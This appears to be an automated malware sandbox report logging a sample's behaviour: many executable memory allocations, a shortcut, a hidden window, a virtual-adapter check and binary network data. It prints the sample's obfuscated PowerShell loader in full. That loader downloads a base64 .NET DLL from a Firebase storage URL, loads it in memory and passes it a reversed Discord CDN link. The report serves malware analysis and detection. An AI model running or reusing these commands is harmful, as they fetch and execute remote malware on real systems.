NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02426000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02489000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027de000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027df000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02841000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02842000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02843000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 10:45 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02844000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;
cmdline	powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\sostener.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 9, 2024, 10:45 a.m.	show_type: 0 filepath_r: powershell parameters: -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL; filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 9, 2024, 10:45 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (13 events)

Data received	W
Data received	Sfµtºmßxcº É,vªnÍ¼AG[DOWNGRD ºAí³÷7p¼k.ü Ls@ûEÛîvï*=À ÿ
Data received	j
Data received
Data received	A¦B0(x¿¬~Ëò[è©+-ðÉ>GEë j6ïÌªÅ?¹ÃoÜÑ'd¿»Ó(hÅkíôãÔ®?àIÝG0E!ÉÔ éB"µ^Ù>Éý¨@9f¶Ç :Ô\| k÷ì@V²iªÍü 'ÞÉ£*¼·:üóUÈåô
Data received
Data received
Data received
Data received
Data received	0
Data received	.ª<ã\«~n·±±03ãâ-KïLÒý@Î¨j^Kêrn´^'Ú©cá
Data received
